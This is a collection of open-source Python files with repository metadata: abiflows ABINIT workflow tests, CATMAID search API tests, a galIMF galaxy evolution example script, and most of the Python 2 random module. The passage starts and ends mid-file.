initialization_info={"test": 1}, autoparal=True) RelaxFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, target_dilatmx=1.01) def test_dfpt_workflow(self): # set ixc otherwise the dte part will fail extra_abivars = {"ixc": 7} DfptFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2], do_ddk=True, do_dde=True, do_strain=True, do_dte=True, smearing=None, spin_mode="unpolarized", extra_abivars=extra_abivars) DfptFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec=None, initialization_info=None, ph_ngqpt=[2, 2, 2], do_ddk=True, do_dde=True, do_strain=False, do_dte=True, extra_abivars=extra_abivars, smearing=None, spin_mode="unpolarized", autoparal=True) class TestFromPreviousInput(AbiflowsTest): @classmethod def setUp(cls): cls.gan_structure = abilab.Structure.from_file(abidata.cif_file("gan.cif")) cls.gan_pseudos = [abidata.pseudos("31ga.pspnc").pseudo_with_symbol('Ga'), abidata.pseudos("7n.pspnc").pseudo_with_symbol('N')] cls.scf_inp = scf_input(cls.gan_structure, cls.gan_pseudos, ecut=2, kppa=10, smearing=None, spin_mode="unpolarized") def test_phonon_workflow(self): PhononFWWorkflow.from_gs_input(gs_input=self.scf_inp, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2]) def test_dte_workflow(self): self.scf_inp['ixc'] = 7 DteFWWorkflow.from_gs_input(gs_input=self.scf_inp, spec={"test": 1}, initialization_info={"test": 1}) def test_dfpt_workflow(self): self.scf_inp['ixc'] = 7 DfptFWWorkflow.from_gs_input(gs_input=self.scf_inp, spec=None, initialization_info=None, ph_ngqpt=[2,2,2], do_ddk=True,do_dde=True, do_strain=True, do_dte=True)
davidwaroquiers/abiflows
abiflows/fireworks/workflows/tests/test_abinit_workflows.py
Python
gpl-2.0
6666
[ "ABINIT" ]
aa8fd94d05b5a6aa969fd33b5faab66049fa0d952ad01ff62a762b042c861a70
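For readers who want to drive one of these workflow factories outside the test harness, a sketch is below. It assumes abipy is installed and configured and that its abidata test files are available, otherwise the imports fail; the calls mirror those in the tests above, but nothing beyond that is guaranteed.

# Sketch of building an SCF workflow from the factory, under the assumption
# that abipy and its test data are installed (as the tests above require).
import abipy.data as abidata
import abipy.abilab as abilab
from abiflows.fireworks.workflows.abinit_workflows import ScfFWWorkflow

gan_structure = abilab.Structure.from_file(abidata.cif_file("gan.cif"))
gan_pseudos = [abidata.pseudos("31ga.pspnc").pseudo_with_symbol('Ga'),
               abidata.pseudos("7n.pspnc").pseudo_with_symbol('N')]
wf = ScfFWWorkflow.from_factory(gan_structure, gan_pseudos, ecut=4,
                                spec={"example": 1}, initialization_info={"example": 1})
print(len(wf.wf.fws))  # number of fireworks in the generated workflow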
# -*- coding: utf-8 -*-

import json

from catmaid.models import ClassInstance

from .common import CatmaidApiTestCase


class SearchApiTests(CatmaidApiTestCase):
    def test_search_with_no_nodes(self):
        self.fake_authentication()
        response = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 'tr'})
        self.assertStatus(response)
        parsed_response = json.loads(response.content.decode('utf-8'))
        expected_result = [
                {"id":374, "name":"downstream-A", "class_name":"neuron"},
                {"id":362, "name":"downstream-B", "class_name":"neuron"}]
        self.assertEqual(expected_result, parsed_response)

    def test_search_with_no_results(self):
        self.fake_authentication()
        response = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 'bobobobobobobo'})
        self.assertStatus(response)
        parsed_response = json.loads(response.content.decode('utf-8'))
        expected_result = []
        self.assertEqual(expected_result, parsed_response)

    def test_search_with_several_nodes(self):
        self.fake_authentication()
        response = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 't'})
        self.assertStatus(response)
        parsed_response = json.loads(response.content.decode('utf-8'))
        expected_result = [
                {"id":465, "name":"tubby bye bye", "class_name":"driver_line"},
                {"id":4, "name":"Fragments", "class_name":"group"},
                {"id":364, "name":"Isolated synaptic terminals", "class_name":"group"},
                {"id":2353, "name":"synapse with more targets", "class_name":"label",
                 "connectors": [{"id": 432, "x": 2640, "y": 3450, "z": 0}]},
                {"id":2345, "name":"t", "class_name":"label"},
                {"id":351, "name":"TODO", "class_name":"label", "nodes":[
                    {"id":349, "x":3580, "y":3350, "z":252, "skid":1},
                    {"id":261, "x":2820, "y":1345, "z":0, "skid":235}],
                 "connectors": [{"y": 3450.0, u"x": 2640.0, u"z": 0.0, u"id": 432}]},
                {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[
                    {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]},
                {"id":374, "name":"downstream-A", "class_name":"neuron"},
                {"id":362, "name":"downstream-B", "class_name":"neuron"},
                {"id":1, "name":"dull skeleton", "class_name":"skeleton"},
                {"id":235, "name":"skeleton 235", "class_name":"skeleton"},
                {"id":2364, "name":"skeleton 2364", "class_name":"skeleton"},
                {"id":2388, "name":"skeleton 2388", "class_name":"skeleton"},
                {"id":2411, "name":"skeleton 2411", "class_name":"skeleton"},
                {"id":2433, "name":"skeleton 2433", "class_name":"skeleton"},
                {"id":2440, "name":"skeleton 2440", "class_name":"skeleton"},
                {"id":2451, "name":"skeleton 2451", "class_name":"skeleton"},
                {"id":2462, "name":"skeleton 2462", "class_name":"skeleton"},
                {"id":2468, "name":"skeleton 2468", "class_name":"skeleton"},
                {"id":361, "name":"skeleton 361", "class_name":"skeleton"},
                {"id":373, "name":"skeleton 373", "class_name":"skeleton"}]
        self.assertCountEqual(expected_result, parsed_response)

    def test_search_with_nodes_and_nonode_label(self):
        self.fake_authentication()
        response = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 'a'})
        self.assertStatus(response)
        parsed_response = json.loads(response.content.decode('utf-8'))
        expected_result = [
                {"id":485, "name":"Local", "class_name":"cell_body_location"},
                {"id":487, "name":"Non-Local", "class_name":"cell_body_location"},
                {"id":454, "name":"and", "class_name":"driver_line"},
                {"id":4, "name":"Fragments", "class_name":"group"},
                {"id":364, "name":"Isolated synaptic terminals", "class_name":"group"},
                {"id":2353, "name":"synapse with more targets", "class_name":"label",
                 "connectors": [{"id": 432, "x": 2640, "y": 3450, "z": 0}]},
                {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[
                    {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]},
                {"id":233, "name":"branched neuron", "class_name":"neuron"},
                {"id":374, "name":"downstream-A", "class_name":"neuron"},
                {"id":362, "name":"downstream-B", "class_name":"neuron"}]
        self.assertEqual(expected_result, parsed_response)

    def test_search_with_nodes_and_duplicate_label(self):
        self.fake_authentication()

        response = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 'uncertain end'})
        self.assertStatus(response)
        parsed_response = json.loads(response.content.decode('utf-8'))
        # Expect only one result that has a node linked
        expected_result = [
            {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[
                {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]},
        ]
        self.assertCountEqual(expected_result, parsed_response)

        # Add a duplicate record of the label, without any node links
        label = ClassInstance.objects.get(id=2342)
        label.id = None
        label.save()

        response2 = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 'uncertain end'})
        self.assertEqual(response2.status_code, 200)
        parsed_response2 = json.loads(response2.content.decode(('utf-8')))
        # Expect the nodes to be not linked to the duplicate record
        expected_result2 = [
            {"id":label.id, "name":"uncertain end", "class_name":"label"},
            {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[
                {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]}
        ]
        self.assertCountEqual(expected_result2, parsed_response2)

    def test_search_with_nodes(self):
        self.fake_authentication()
        response = self.client.get(
                '/%d/search' % self.test_project_id,
                {'substring': 'c'})
        self.assertStatus(response)
        parsed_response = json.loads(response.content.decode('utf-8'))
        expected_result = [
                {"id":485, "name":"Local", "class_name":"cell_body_location"},
                {"id":487, "name":"Non-Local", "class_name":"cell_body_location"},
                {"id":458, "name":"c005", "class_name":"driver_line"},
                {"id":364, "name":"Isolated synaptic terminals", "class_name":"group"},
                {"id":2342, "name":"uncertain end", "class_name":"label",
                 "nodes":[{"id":403, "x":7840, "y":2380, "z":0, "skid":373}]},
                {"id":233, "name":"branched neuron", "class_name":"neuron"}]
        self.assertEqual(expected_result, parsed_response)
catmaid/CATMAID
django/applications/catmaid/tests/apis/test_search.py
Python
gpl-3.0
7309
[ "NEURON" ]
9e39811a7bb91c67b8a5a227aac53ac0d598a9883db7c9792b0e1fd45aae3dc8
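A detail worth noting in the tests above is the switch between assertEqual and assertCountEqual: the latter compares elements regardless of order, which matters for endpoints whose result ordering is not guaranteed. A self-contained illustration using only the standard library:

# Stdlib-only demo of order-insensitive comparison, mirroring the pattern in
# the duplicate-label test above; the data here is a made-up two-item sample.
import unittest

class OrderDemo(unittest.TestCase):
    def test_order_insensitive(self):
        a = [{"id": 374, "name": "downstream-A"}, {"id": 362, "name": "downstream-B"}]
        b = list(reversed(a))
        self.assertCountEqual(a, b)  # passes: same elements, any order
        self.assertRaises(AssertionError,
                          self.assertEqual, a, b)  # assertEqual is order-sensitive

unittest.main(argv=["demo"], exit=False)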
# Python3 code
# An example
import galevo

print("\n ================================\n"
      " === example_galaxy_evolution ===\n"
      " ================================\n")
print(" This test code serves as an example, "
      "explaining (see comments in the code) the input parameters of the galaxy chemical evolution model.\n")

Log_SFR = float(input(
    " Please input the logarithmic star formation rate in the unit of solar mass per yr "
    "and ended the input with the return key.\n"
    " A typical input SFR is from -4 to 4. "
    "Note that the code does not support extremely low SFR "
    "as the IMF integration error is significant for very top-light gwIMFs.\n\n"
    " log_{10}(SFR [M_sun/yr]) = "))

SFH_shape = input(
    "\n\n Please input the shape of the SFH "
    "and ended the input with the return key.\n"
    " The input can only be: 1 for a flat SFH or 2 for a skewnorm SFH, where the latter cost more calculation time.\n\n"
    " ")
if SFH_shape == '1':
    SFH_shape = 'flat'
elif SFH_shape == '2':
    SFH_shape = 'skewnorm'

# Other SFH shape parameters
location = 0
skewness = 10
sfr_tail = 0

SFEN = round(float(input(
    "\n\n Please input the characteristic star formation timescale in the unit of 10 Myr (integer only) "
    "and ended the input with the return key.\n"
    " We recommend a value smaller than 10 for 'flat' SFH and smaller than 3 for 'skewnorm' SFH for the first run, "
    "as longer timescale calculations take more time.\n\n"
    " SFT [10Myr] = ")))
if SFEN < 1:
    print("\n\n### Warning: Wrong input 'SFEN' smaller than 1! Correct SFEN to 1. ###\n\n")
    SFEN = 1

print('\nGenerating new SFH...')
galevo.generate_SFH(SFH_shape, Log_SFR, SFEN, sfr_tail, skewness, location)

print('\nStart galaxy simulation...\n')
galevo.galaxy_evol(
    imf='igimf',
    STF=0.3,  # unrealistic results if more star are forming at a time step than the instantaneous gas mass
    SFEN=SFEN,
    Z_0=0.00000001886,
    solar_mass_component="Anders1989_mass",
    str_yield_table='portinari98',
    IMF_name='Kroupa',
    steller_mass_upper_bound=150,
    time_resolution_in_Myr=1,
    mass_boundary_observe_low=1.5,
    mass_boundary_observe_up=8,
    SFH_model='provided',
    SFE=0.013,  # This parameter is not applied when SFH_model='provided'.
    SNIa_ON=True,
    high_time_resolution=None,
    plot_show=True,
    plot_save=None,
    outflow=None,
    check_igimf=True)
Azeret/galIMF
example_galaxy_evolution.py
Python
gpl-3.0
2473
[ "Galaxy" ]
963c61ecda0473055cef80c99289b460ef90436534265434a5e24de50feebbb9
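The SFEN handling above quietly clamps out-of-range input to the model's minimum of 1 (in units of 10 Myr) rather than aborting. A standalone sketch of that parse-and-clamp step; the helper name parse_sfen is invented for illustration and is not part of galevo.

# Hypothetical helper mirroring the script's SFEN input handling above.
def parse_sfen(raw):
    sfen = round(float(raw))
    if sfen < 1:
        print("### Warning: SFEN smaller than 1! Correcting to 1. ###")
        sfen = 1
    return sfen

print(parse_sfen("0.4"))  # clamped to 1
print(parse_sfen("2.6"))  # rounds to 3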
"""Random variable generators. integers -------- uniform within range sequences --------- pick random element pick random sample generate random permutation distributions on the real line: ------------------------------ uniform triangular normal (Gaussian) lognormal negative exponential gamma beta pareto Weibull distributions on the circle (angles 0 to 2pi) --------------------------------------------- circular uniform von Mises General notes on the underlying Mersenne Twister core generator: * The period is 2**19937-1. * It is one of the most extensively tested generators in existence. * Without a direct way to compute N steps forward, the semantics of jumpahead(n) are weakened to simply jump to another distant state and rely on the large period to avoid overlapping sequences. * The random() method is implemented in C, executes in a single Python step, and is, therefore, threadsafe. """ from __future__ import division from warnings import warn as _warn from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin from os import urandom as _urandom from binascii import hexlify as _hexlify import hashlib as _hashlib __all__ = ["Random","seed","random","uniform","randint","choice","sample", "randrange","shuffle","normalvariate","lognormvariate", "expovariate","vonmisesvariate","gammavariate","triangular", "gauss","betavariate","paretovariate","weibullvariate", "getstate","setstate","jumpahead", "WichmannHill", "getrandbits", "SystemRandom"] NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0) TWOPI = 2.0*_pi LOG4 = _log(4.0) SG_MAGICCONST = 1.0 + _log(4.5) BPF = 53 # Number of bits in a float RECIP_BPF = 2**-BPF # Translated by Guido van Rossum from C source provided by # Adrian Baddeley. Adapted by Raymond Hettinger for use with # the Mersenne Twister and os.urandom() core generators. import _random class Random(_random.Random): """Random number generator base class used by bound module functions. Used to instantiate instances of Random to get generators that don't share state. Especially useful for multi-threaded programs, creating a different instance of Random for each thread, and using the jumpahead() method to ensure that the generated sequences seen by each thread don't overlap. Class Random can also be subclassed if you want to use a different basic generator of your own devising: in that case, override the following methods: random(), seed(), getstate(), setstate() and jumpahead(). Optionally, implement a getrandbits() method so that randrange() can cover arbitrarily large ranges. """ VERSION = 3 # used by getstate/setstate def __init__(self, x=None): """Initialize an instance. Optional argument x controls seeding, as for Random.seed(). """ self.seed(x) self.gauss_next = None def seed(self, a=None): """Initialize internal state of the random number generator. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or is an int or long, hash(a) is used instead. Hash values for some types are nondeterministic when the PYTHONHASHSEED environment variable is enabled. 
""" if a is None: try: # Seed with enough bytes to span the 19937 bit # state space for the Mersenne Twister a = long(_hexlify(_urandom(2500)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds super(Random, self).seed(a) self.gauss_next = None def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, super(Random, self).getstate(), self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 3: version, internalstate, self.gauss_next = state super(Random, self).setstate(internalstate) elif version == 2: version, internalstate, self.gauss_next = state # In version 2, the state was saved as signed ints, which causes # inconsistencies between 32/64-bit systems. The state is # really unsigned 32-bit ints, so we convert negative ints from # version 2 to positive longs for version 3. try: internalstate = tuple( long(x) % (2**32) for x in internalstate ) except ValueError, e: raise TypeError, e super(Random, self).setstate(internalstate) else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) def jumpahead(self, n): """Change the internal state to one that is likely far away from the current state. This method will not be in Py3.x, so it is better to simply reseed. """ # The super.jumpahead() method uses shuffling to change state, # so it needs a large and "interesting" n to work with. Here, # we use hashing to create a large n for the shuffle. s = repr(n) + repr(self.getstate()) n = int(_hashlib.new('sha512', s).hexdigest(), 16) super(Random, self).jumpahead(n) ## ---- Methods below this point do not need to be overridden when ## ---- subclassing for the purpose of using a different core generator. ## -------------------- pickle support ------------------- def __getstate__(self): # for pickle return self.getstate() def __setstate__(self, state): # for pickle self.setstate(state) def __reduce__(self): return self.__class__, (), self.getstate() ## -------------------- integer methods ------------------- def randrange(self, start, stop=None, step=1, _int=int, _maxwidth=1L<<BPF): """Choose a random item from range(start, stop[, step]). This fixes the problem with randint() which includes the endpoint; in Python this is usually not what you want. """ # This code is a bit messy to make it fast for the # common case while still doing adequate error checking. istart = _int(start) if istart != start: raise ValueError, "non-integer arg 1 for randrange()" if stop is None: if istart > 0: if istart >= _maxwidth: return self._randbelow(istart) return _int(self.random() * istart) raise ValueError, "empty range for randrange()" # stop argument supplied. istop = _int(stop) if istop != stop: raise ValueError, "non-integer stop for randrange()" width = istop - istart if step == 1 and width > 0: # Note that # int(istart + self.random()*width) # instead would be incorrect. For example, consider istart # = -2 and istop = 0. Then the guts would be in # -2.0 to 0.0 exclusive on both ends (ignoring that random() # might return 0.0), and because int() truncates toward 0, the # final result would be -1 or 0 (instead of -2 or -1). # istart + int(self.random()*width) # would also be incorrect, for a subtler reason: the RHS # can return a long, and then randrange() would also return # a long, but we're supposed to return an int (for backward # compatibility). 
if width >= _maxwidth: return _int(istart + self._randbelow(width)) return _int(istart + _int(self.random()*width)) if step == 1: raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width) # Non-unit step argument supplied. istep = _int(step) if istep != step: raise ValueError, "non-integer step for randrange()" if istep > 0: n = (width + istep - 1) // istep elif istep < 0: n = (width + istep + 1) // istep else: raise ValueError, "zero step for randrange()" if n <= 0: raise ValueError, "empty range for randrange()" if n >= _maxwidth: return istart + istep*self._randbelow(n) return istart + istep*_int(self.random() * n) def randint(self, a, b): """Return random integer in range [a, b], including both end points. """ return self.randrange(a, b+1) def _randbelow(self, n, _log=_log, _int=int, _maxwidth=1L<<BPF, _Method=_MethodType, _BuiltinMethod=_BuiltinMethodType): """Return a random int in the range [0,n) Handles the case where n has more bits than returned by a single call to the underlying generator. """ try: getrandbits = self.getrandbits except AttributeError: pass else: # Only call self.getrandbits if the original random() builtin method # has not been overridden or if a new getrandbits() was supplied. # This assures that the two methods correspond. if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method: k = _int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2) r = getrandbits(k) while r >= n: r = getrandbits(k) return r if n >= _maxwidth: _warn("Underlying random() generator does not supply \n" "enough bits to choose from a population range this large") return _int(self.random() * n) ## -------------------- sequence methods ------------------- def choice(self, seq): """Choose a random element from a non-empty sequence.""" return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty def shuffle(self, x, random=None): """x, random=random.random -> shuffle list x in place; return None. Optional arg random is a 0-argument function returning a random float in [0.0, 1.0); by default, the standard random.random. """ if random is None: random = self.random _int = int for i in reversed(xrange(1, len(x))): # pick an element in x[:i+1] with which to exchange x[i] j = _int(random() * (i+1)) x[i], x[j] = x[j], x[i] def sample(self, population, k): """Chooses k unique random elements from a population sequence. Returns a new list containing elements from the population while leaving the original population unchanged. The resulting list is in selection order so that all sub-slices will also be valid random samples. This allows raffle winners (the sample) to be partitioned into grand prize and second place winners (the subslices). Members of the population need not be hashable or unique. If the population contains repeats, then each occurrence is a possible selection in the sample. To choose a sample in a range of integers, use xrange as an argument. This is especially fast and space efficient for sampling from a large population: sample(xrange(10000000), 60) """ # Sampling without replacement entails tracking either potential # selections (the pool) in a list or previous selections in a set. # When the number of selections is small compared to the # population, then tracking selections is efficient, requiring # only a small set and an occasional reselection. For # a larger number of selections, the pool tracking method is # preferred since the list takes less space than the # set and it doesn't suffer from frequent reselections. 
n = len(population) if not 0 <= k <= n: raise ValueError("sample larger than population") random = self.random _int = int result = [None] * k setsize = 21 # size of a small set minus size of an empty list if k > 5: setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets if n <= setsize or hasattr(population, "keys"): # An n-length list is smaller than a k-length set, or this is a # mapping type so the other algorithm wouldn't work. pool = list(population) for i in xrange(k): # invariant: non-selected at [0,n-i) j = _int(random() * (n-i)) result[i] = pool[j] pool[j] = pool[n-i-1] # move non-selected item into vacancy else: try: selected = set() selected_add = selected.add for i in xrange(k): j = _int(random() * n) while j in selected: j = _int(random() * n) selected_add(j) result[i] = population[j] except (TypeError, KeyError): # handle (at least) sets if isinstance(population, list): raise return self.sample(tuple(population), k) return result ## -------------------- real-valued distributions ------------------- ## -------------------- uniform distribution ------------------- def uniform(self, a, b): "Get a random number in the range [a, b) or [a, b] depending on rounding." return a + (b-a) * self.random() ## -------------------- triangular -------------------- def triangular(self, low=0.0, high=1.0, mode=None): """Triangular distribution. Continuous distribution bounded by given lower and upper limits, and having a given mode value in-between. http://en.wikipedia.org/wiki/Triangular_distribution """ u = self.random() try: c = 0.5 if mode is None else (mode - low) / (high - low) except ZeroDivisionError: return low if u > c: u = 1.0 - u c = 1.0 - c low, high = high, low return low + (high - low) * (u * c) ** 0.5 ## -------------------- normal distribution -------------------- def normalvariate(self, mu, sigma): """Normal distribution. mu is the mean, and sigma is the standard deviation. """ # mu = mean, sigma = standard deviation # Uses Kinderman and Monahan method. Reference: Kinderman, # A.J. and Monahan, J.F., "Computer generation of random # variables using the ratio of uniform deviates", ACM Trans # Math Software, 3, (1977), pp257-260. random = self.random while 1: u1 = random() u2 = 1.0 - random() z = NV_MAGICCONST*(u1-0.5)/u2 zz = z*z/4.0 if zz <= -_log(u2): break return mu + z*sigma ## -------------------- lognormal distribution -------------------- def lognormvariate(self, mu, sigma): """Log normal distribution. If you take the natural logarithm of this distribution, you'll get a normal distribution with mean mu and standard deviation sigma. mu can have any value, and sigma must be greater than zero. """ return _exp(self.normalvariate(mu, sigma)) ## -------------------- exponential distribution -------------------- def expovariate(self, lambd): """Exponential distribution. lambd is 1.0 divided by the desired mean. It should be nonzero. (The parameter would be called "lambda", but that is a reserved word in Python.) Returned values range from 0 to positive infinity if lambd is positive, and from negative infinity to 0 if lambd is negative. """ # lambd: rate lambd = 1/mean # ('lambda' is a Python reserved word) # we use 1-random() instead of random() to preclude the # possibility of taking the log of zero. return -_log(1.0 - self.random())/lambd ## -------------------- von Mises distribution -------------------- def vonmisesvariate(self, mu, kappa): """Circular data distribution. 
mu is the mean angle, expressed in radians between 0 and 2*pi, and kappa is the concentration parameter, which must be greater than or equal to zero. If kappa is equal to zero, this distribution reduces to a uniform random angle over the range 0 to 2*pi. """ # mu: mean angle (in radians between 0 and 2*pi) # kappa: concentration parameter kappa (>= 0) # if kappa = 0 generate uniform random angle # Based upon an algorithm published in: Fisher, N.I., # "Statistical Analysis of Circular Data", Cambridge # University Press, 1993. # Thanks to Magnus Kessler for a correction to the # implementation of step 4. random = self.random if kappa <= 1e-6: return TWOPI * random() s = 0.5 / kappa r = s + _sqrt(1.0 + s * s) while 1: u1 = random() z = _cos(_pi * u1) d = z / (r + z) u2 = random() if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d): break q = 1.0 / r f = (q + z) / (1.0 + q * z) u3 = random() if u3 > 0.5: theta = (mu + _acos(f)) % TWOPI else: theta = (mu - _acos(f)) % TWOPI return theta ## -------------------- gamma distribution -------------------- def gammavariate(self, alpha, beta): """Gamma distribution. Not the gamma function! Conditions on the parameters are alpha > 0 and beta > 0. The probability distribution function is: x ** (alpha - 1) * math.exp(-x / beta) pdf(x) = -------------------------------------- math.gamma(alpha) * beta ** alpha """ # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2 # Warning: a few older sources define the gamma distribution in terms # of alpha > -1.0 if alpha <= 0.0 or beta <= 0.0: raise ValueError, 'gammavariate: alpha and beta must be > 0.0' random = self.random if alpha > 1.0: # Uses R.C.H. Cheng, "The generation of Gamma # variables with non-integral shape parameters", # Applied Statistics, (1977), 26, No. 1, p71-74 ainv = _sqrt(2.0 * alpha - 1.0) bbb = alpha - LOG4 ccc = alpha + ainv while 1: u1 = random() if not 1e-7 < u1 < .9999999: continue u2 = 1.0 - random() v = _log(u1/(1.0-u1))/ainv x = alpha*_exp(v) z = u1*u1*u2 r = bbb+ccc*v-x if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z): return x * beta elif alpha == 1.0: # expovariate(1) u = random() while u <= 1e-7: u = random() return -_log(u) * beta else: # alpha is between 0 and 1 (exclusive) # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle while 1: u = random() b = (_e + alpha)/_e p = b*u if p <= 1.0: x = p ** (1.0/alpha) else: x = -_log((b-p)/alpha) u1 = random() if p > 1.0: if u1 <= x ** (alpha - 1.0): break elif u1 <= _exp(-x): break return x * beta ## -------------------- Gauss (faster alternative) -------------------- def gauss(self, mu, sigma): """Gaussian distribution. mu is the mean, and sigma is the standard deviation. This is slightly faster than the normalvariate() function. Not thread-safe without a lock around calls. """ # When x and y are two variables from [0, 1), uniformly # distributed, then # # cos(2*pi*x)*sqrt(-2*log(1-y)) # sin(2*pi*x)*sqrt(-2*log(1-y)) # # are two *independent* variables with normal distribution # (mu = 0, sigma = 1). # (Lambert Meertens) # (corrected version; bug discovered by Mike Miller, fixed by LM) # Multithreading note: When two threads call this function # simultaneously, it is possible that they will receive the # same return value. The window is very small though. To # avoid this, you have to use a lock around all calls. (I # didn't want to slow this down in the serial case by using a # lock here.) 
random = self.random z = self.gauss_next self.gauss_next = None if z is None: x2pi = random() * TWOPI g2rad = _sqrt(-2.0 * _log(1.0 - random())) z = _cos(x2pi) * g2rad self.gauss_next = _sin(x2pi) * g2rad return mu + z*sigma ## -------------------- beta -------------------- ## See ## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html ## for Ivan Frohne's insightful analysis of why the original implementation: ## ## def betavariate(self, alpha, beta): ## # Discrete Event Simulation in C, pp 87-88. ## ## y = self.expovariate(alpha) ## z = self.expovariate(1.0/beta) ## return z/(y+z) ## ## was dead wrong, and how it probably got that way. def betavariate(self, alpha, beta): """Beta distribution. Conditions on the parameters are alpha > 0 and beta > 0. Returned values range between 0 and 1. """ # This version due to Janne Sinkkonen, and matches all the std # texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution"). y = self.gammavariate(alpha, 1.) if y == 0: return 0.0 else: return y / (y + self.gammavariate(beta, 1.)) ## -------------------- Pareto -------------------- def paretovariate(self, alpha): """Pareto distribution. alpha is the shape parameter.""" # Jain, pg. 495 u = 1.0 - self.random() return 1.0 / pow(u, 1.0/alpha) ## -------------------- Weibull -------------------- def weibullvariate(self, alpha, beta): """Weibull distribution. alpha is the scale parameter and beta is the shape parameter. """ # Jain, pg. 499; bug fix courtesy Bill Arms u = 1.0 - self.random() return alpha * pow(-_log(u), 1.0/beta) ## -------------------- Wichmann-Hill ------------------- class WichmannHill(Random): VERSION = 1 # used by getstate/setstate def seed(self, a=None): """Initialize internal state from hashable object. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or an int or long, hash(a) is used instead. If a is an int or long, a is used directly. Distinct values between 0 and 27814431486575L inclusive are guaranteed to yield distinct internal states (this guarantee is specific to the default Wichmann-Hill generator). """ if a is None: try: a = long(_hexlify(_urandom(16)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds if not isinstance(a, (int, long)): a = hash(a) a, x = divmod(a, 30268) a, y = divmod(a, 30306) a, z = divmod(a, 30322) self._seed = int(x)+1, int(y)+1, int(z)+1 self.gauss_next = None def random(self): """Get the next random number in the range [0.0, 1.0).""" # Wichmann-Hill random number generator. # # Wichmann, B. A. & Hill, I. D. (1982) # Algorithm AS 183: # An efficient and portable pseudo-random number generator # Applied Statistics 31 (1982) 188-190 # # see also: # Correction to Algorithm AS 183 # Applied Statistics 33 (1984) 123 # # McLeod, A. I. (1985) # A remark on Algorithm AS 183 # Applied Statistics 34 (1985),198-200 # This part is thread-unsafe: # BEGIN CRITICAL SECTION x, y, z = self._seed x = (171 * x) % 30269 y = (172 * y) % 30307 z = (170 * z) % 30323 self._seed = x, y, z # END CRITICAL SECTION # Note: on a platform using IEEE-754 double arithmetic, this can # never return 0.0 (asserted by Tim; proof too long for a comment). 
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0 def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, self._seed, self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 1: version, self._seed, self.gauss_next = state else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) def jumpahead(self, n): """Act as if n calls to random() were made, but quickly. n is an int, greater than or equal to 0. Example use: If you have 2 threads and know that each will consume no more than a million random numbers, create two Random objects r1 and r2, then do r2.setstate(r1.getstate()) r2.jumpahead(1000000) Then r1 and r2 will use guaranteed-disjoint segments of the full period. """ if not n >= 0: raise ValueError("n must be >= 0") x, y, z = self._seed x = int(x * pow(171, n, 30269)) % 30269 y = int(y * pow(172, n, 30307)) % 30307 z = int(z * pow(170, n, 30323)) % 30323 self._seed = x, y, z def __whseed(self, x=0, y=0, z=0): """Set the Wichmann-Hill seed from (x, y, z). These must be integers in the range [0, 256). """ if not type(x) == type(y) == type(z) == int: raise TypeError('seeds must be integers') if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): raise ValueError('seeds must be in range(0, 256)') if 0 == x == y == z: # Initialize from current time import time t = long(time.time() * 256) t = int((t&0xffffff) ^ (t>>24)) t, x = divmod(t, 256) t, y = divmod(t, 256) t, z = divmod(t, 256) # Zero is a poor seed, so substitute 1 self._seed = (x or 1, y or 1, z or 1) self.gauss_next = None def whseed(self, a=None): """Seed from hashable object's hash code. None or no argument seeds from current time. It is not guaranteed that objects with distinct hash codes lead to distinct internal states. This is obsolete, provided for compatibility with the seed routine used prior to Python 2.1. Use the .seed() method instead. """ if a is None: self.__whseed() return a = hash(a) a, x = divmod(a, 256) a, y = divmod(a, 256) a, z = divmod(a, 256) x = (x + a) % 256 or 1 y = (y + a) % 256 or 1 z = (z + a) % 256 or 1 self.__whseed(x, y, z) ## --------------- Operating System Random Source ------------------ class SystemRandom(Random): """Alternate random number generator using sources provided by the operating system (such as /dev/urandom on Unix or CryptGenRandom on Windows). Not available on all systems (see os.urandom() for details). """ def random(self): """Get the next random number in the range [0.0, 